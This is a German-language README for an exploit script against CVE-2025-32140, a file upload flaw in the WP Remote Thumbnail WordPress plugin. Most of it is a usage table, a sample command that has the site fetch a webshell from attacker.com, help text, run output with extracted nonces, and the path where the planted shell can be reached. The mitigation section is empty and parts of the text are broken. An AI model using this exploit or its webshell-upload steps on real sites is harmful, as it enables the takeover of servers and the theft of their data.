
WordPress WP Remote Thumbnail Plugin <= 1.3.2 ist anfällig für Arbitrary File Upload.
CVE-2025-32140 ist eine kritische Sicherheitslücke im WP Remote Thumbnail-Plugin für WordPress. Sie ermöglicht es authentifizierten Angreifern (mit Beitragsersteller- oder höheren Berechtigungen), beliebige Dateien wie z. B. Webshells hochzuladen, indem sie eine fehlerhafte Funktion missbrauchen, die ungeprüfte URLs akzeptiert.
Das Plugin validiert weder den Dateityp noch den Inhalt, der von der bereitgestellten remote_thumb-URL abgerufen wird. Dadurch können Angreifer schädliche PHP-Dateien (z. B. Hintertüren) im Verzeichnis /wp-content/uploads speichern.
edit_post)Dieses Python-Skript automatisiert die Ausnutzung von CVE-2025-32140 und führt die folgenden Schritte aus:
remote_thumb.| Option | Alias | Beschreibung |
|---|---|---|
--url | -u | URL der Ziel-WordPress-Seite (z. B. http://target.com/wordpress) |
--username | -un | WordPress-Benutzername mit Beitragsbearbeitungsrechten |
--password | -p | Passwort für den angegebenen Benutzernamen |
--user_ID | -uid | WordPress-Benutzer-ID (normalerweise 1 für Admin) |
--post_ID | -pid | ID des zu bearbeitenden Beitrags (kann ein Entwurf sein) |
--shell | Direkte URL zu einer PHP-Webshell, die auf dem Server des Angreifers gehostet wird |
python CVE-2025-32140.py -u http://target.com/wordpress -un admin -p admin -uid 1 -pid 631 --shell http://attacker.com/shell.php
usage: CVE-2025-32140.py [-h] --url URL --username USERNAME --password PASSWORD --user_ID USER_ID --post_ID POST_ID --shell SHELL
Exploit For CVE-2025-32140 # By: Nxploited | Khaled Alenazi
options:
-h, --help show this help message and exit
--url, -u URL Target WordPress site URL (e.g., http://192.168.100.74:888/wordpress)
--username, -un USERNAME
Username
--password, -p PASSWORD
Password
--user_ID, -uid USER_ID
User ID (usually 1 for admin)
--post_ID, -pid POST_ID
Target post ID
--shell SHELL URL of the shell to be uploaded (e.g., http://attacker.com/shell.php)
[+] Logged in successfully.
[+] Cookies set successfully.
[DEBUG] Extracted _wpnonce: b4ef78e77d
[DEBUG] Extracted meta-box-order-nonce: 0c192fe62e
[DEBUG] Extracted closedpostboxesnonce: 52be514040
[DEBUG] Extracted samplepermalinknonce: 7b213c6597
[DEBUG] Extracted wprthumb_nonce: 45803ee312
[DEBUG] Extracted X-WP-Nonce: None
[+] Exploit POST sent successfully. Check your uploads directory.
By: Nxploited ( Khaled Alenazi ) | https://github.com/Nxploited
Nach erfolgreichem Exploit befindet sich die hochgeladene Webshell voraussichtlich unter:
http://target.com/wordpress/wp-content/uploads/YYYY/MM/shell.php
Ersetzen Sie YYYY/MM durch das aktuelle Jahr und den Monat des Uploads.
Um das Risiko durch diese Sicherheitslücke zu verringern:
Dieses Skript dient ausschließlich zu Bildungszwecken.
Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Exploit verursacht werden.
Von: Nxploited ( Khaled Alenazi ) 🌟